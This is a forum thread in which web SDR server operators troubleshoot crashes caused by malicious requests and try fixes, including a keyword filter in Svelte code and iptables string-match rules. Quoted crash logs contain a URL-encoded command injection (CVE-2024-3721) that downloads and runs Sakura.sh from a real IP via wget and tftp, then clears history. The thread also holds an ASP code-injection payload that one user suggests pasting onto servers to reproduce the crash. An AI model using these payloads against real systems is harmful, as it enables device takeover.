Hi
My instance crashes regularly with error:
terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
what(): filesystem error: status: File name too long [//device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.73%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+tftp+-g+146.103.53.73+-r+tftp1.sh%3B+chmod+777+%2A%3B+sh+tftp1.sh%3B+rm+-rf+%2A.sh%3B+history+-c]
To me it looks like some sort of tried code injection attack. Anyone has an idea how to prevent this?
I have not seen that yet, but below is the script (I assume).
#!/bin/bash
## sakura
## version 0.0.1 - initial
##################################################
sakura() {
true
}
##################################################
if [ ${#} -eq 0 ]
then
true
else
exit 1 # wrong args
fi
##################################################
sakura
##################################################
## generated by create-stub2.sh v0.1.2
## on Fri, 28 Jun 2019 17:24:34 +0900
## see <https://github.com/temptemp3/sh2>
##################################################
https://github.com/temptemp3/sakura.sh/blob/master/sakura.sh
Yep it's injection alright:
https://github.com/netsecfish/tbk_dvr_command_injection
More info here:
https://nvd.nist.gov/vuln/detail/CVE-2024-3721
I would check the IP's they come from and ban them.
They try to write and execute a file on your filesystem as far as I can see. But I doubt anything happens apart from a crash.
Check your drive for filenames you see in the command.
As much as I can see there is no file or so on the drive. IP is from UK and I already reported it. Is there any way to prevent this kind of stuff from beeing entered in to the system (they crash it daily with this) else im just gonna remove the chatbox
We can add some of the common extensions / commands to the bad word list. That should help.
You can add chmod, root, .sh, etc to the chat.cpp file then recompile the backend.
This will help :
Modify sendMessage() in App.svelte
function sendMessage() {
newMessage = newMessage.replace(/[^\x00-\x7F]/g, ""); // Strips non-ASCII
newMessage = stripText(newMessage);
if (newMessage.trim() && username.trim()) {
const messageObject = {
cmd: "chat",
message: newMessage.trim(),
username: username,
};
socket.send(JSON.stringify(messageObject));
newMessage = "";
scrollToBottom();
}
}
And add this function to App.svelte
function stripText(s) {
let badStrings = ['777', 'chmod', '.sh', 'chown', 'tftp'];
let fixedStrings = new RegExp('\\b(' + badStrings.join('|') + ')\\b', 'g');
return (s || '').replace(fixedStrings, '').replace(/[ ]{2,}/, ' ');
}
I will add this to the current build now.
Hi Phil
Thanks for the code, sorry had not much time last weeks but now tested it. It still has the same crash some bad guys trying to do this
terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
what(): filesystem error: status: File name too long [//device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.37%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+tftp+-g+146.103.53.37+-r+tftp1.sh%3B+chmod+777+%2A%3B+sh+tftp1.sh%3B+rm+-rf+%2A.sh%3B+history+-c]
Any idea what I still could do?
Are you sure it's an injection?
As I found this:
https://github.com/azerothcore/azerothcore-wotlk/issues/6889#issuecomment-878552846
Describing the problem.
So question is...what OS etc are you running? Was it compiled with the suggested OS? And compilers?
We have seen more problems when people use something different then Ubuntu 22.04
Why doesn't it happen to all others? And just you? It seems to come from device.rsp....could it be Soapy?
Not much info to go on beside you repeating the error but not telling us what you use, toml, start-stopr-script etc.
You can reproduce it if you put any random stuff behinde the URL i found out
http://sardinia-sdr.ddns.net/%3C%%20If%20not%20isEmpty(Request(%20%22Data%22%20)%20)%20Then%20Dim%20fso,%20f%20'User%20input%20Data%20is%20written%20to%20a%20file%20named%20data.txt%20Set%20fso%20=%20CreateObject(%22Scripting.FileSystemObject%22)%20Set%20f%20=%20fso.OpenTextFile(Server.MapPath(%20%22data.txt%22%20),%208,%20True)%20f.Write%20Request(%22Data%22)%20&%20vbCrLf%20f.close%20Set%20f%20=%20nothing%20Set%20fso%20=%20Nothing%20'Data.txt%20is%20executed%20Server.Execute(%20%22data.txt%22%20)%20Else%20%%3E%20%3Cform%3E%20%3Cinput%20name=%22Data%22%20/%3E%3Cinput%20type=%22submit%22%20name=%22Enter%20Data%22%20/%3E%20%3C/form%3E%20%3C%%20End%20If%20%%3E)))
and it crashes with the error
terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
what(): filesystem error: status: File name too long [//%3C%%20If%20not%20isEmpty(Request(%20%22Data%22%20)%20)%20Then%20Dim%20fso,%20f%20'User%20input%20Data%20is%20written%20to%20a%20file%20named%20data.txt%20Set%20fso%20=%20CreateObject(%22Scripting.FileSystemObject%22)%20Set%20f%20=%20fso.OpenTextFile(Server.MapPath(%20%22data.txt%22%20),%208,%20True)%20f.Write%20Request(%22Data%22)%20&%20vbCrLf%20f.close%20Set%20f%20=%20nothing%20Set%20fso%20=%20Nothing%20'Data.txt%20is%20executed%20Server.Execute(%20%22data.txt%22%20)%20Else%20%%3E%20%3Cform%3E%20%3Cinput%20name=%22Data%22%20/%3E%3Cinput%20type=%22submit%22%20name=%22Enter%20Data%22%20/%3E%20%3C/form%3E%20%3C%%20End%20If%20%%3E)))]
This happens on any phantom sdr instance i have but somebody is penetrating sardinia-sdr.ddns.net
Atm i have no idea how to prevent this from happening
If you want to try it just post the script from this page after a / behind url of your server and you will see it crashing
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection#:~:text=In%20Code%20Injection%20testing%2C%20a,%2C%20e.g.%2C%20ASP%20or%20PHP.
Thanks for posting that Gianni. I will try to look further into that, but I believe Bas is far beyond me in finding a solution.
I have logged the issue:
*** longjmp causes uninitialized stack frame ***: terminate
OK, now to find the issue itself, I have some idea's....thanks for the data.
Not either....but I know the problem now.
The first sign of the string is %3C% that equals to '<' and that is an injection code.
Ok, found a quick and dirty methode to stop it from happening, as the first is always %3C%....so we add to the webserver start-script this:
iptables -A INPUT -m string --algo bm --string "%3C%" -j DROP
Any URL that as %3C% in it will be blocked by the firewall, maybe it needs tuning, but it works!!!! YES!!!!!
Beware, if you restart a lot, it add's the same line over and over.
To stop that from happening, put this before the adding-line:
iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
Then it removes it first, then adds.
Make sure that 'iptables -L' lists the line first!!! Else it may not work or being overruled.
Best to kill/delete UFW, it's sort of useless.
Thanks for your Research Bas, but for me its not working:
gianni@sdr-srv02:~$ iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables v1.8.7 (nf_tables): Couldn't load match `string':No such file or directory
or with sudo:
gianni@sdr-srv02:~$ sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables: Bad rule (does a matching rule exist in that chain?).
Hi,
my Ubuntu 22.0.4
Quotedarko@buster:~$ sudo su
[sudo] lozinka za darko:
root@buster:/home/darko# iptables -A INPUT -m string --algo bm --string "%3C%" -j DROP
root@buster:/home/darko# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP all -- anywhere anywhere STRING match "%3C%" ALGO name bm TO 65535
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
root@buster:/home/darko#
and LMDE 6
Quoteroot@Siemens:/home/websdr# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP all -- anywhere anywhere STRING match "%3C%" ALGO name bm
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
root@Siemens:/home/websdr#
Is this OK? :)
Quote from: hb3xdc on May 26, 2025, 10:35 PMThanks for your Research Bas, but for me its not working:
gianni@sdr-srv02:~$ iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables v1.8.7 (nf_tables): Couldn't load match `string':No such file or directory
or with sudo:
gianni@sdr-srv02:~$ sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables: Bad rule (does a matching rule exist in that chain?).
Just remove the deletion entry from your iptables script. It is trying to delete an entry that does not yet exist.
sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
Linux has a nice option: man command
To know iptables and what it does, type: man iptables
It will tell you what everything does.
Quote from: Bas ON5HB on May 27, 2025, 01:00 PMLiunux has a nice option: man command
To know iptables and what it does, type: man iptables
It will tell you what everything does.
Thanks,
I know that but there are people who don't.
Old Linux/Unix masters used to answer similar questions with the acronym RTFM.
I guarantee, that acronym ALWAYS HELPS! ;)
Best regards,
Darko, 9a7aof
And they managed again....different line....so I adopted the iptables:
iptables -D INPUT -m string --algo kmp --string "%3C%" -j DROP
iptables -D INPUT -m string --algo kmp --string "device.rsp" -j DROP
iptables -A INPUT -m string --algo kmp --string "%3C%" -j DROP
iptables -A INPUT -m string --algo kmp --string "device.rsp" -j DROP
As they attack the device.rsp all the time, I added that too.
Also replaced algo with KMP as KMP can scan over multiple TCP-packets, where BM may miss it.
Hopefully it's over now.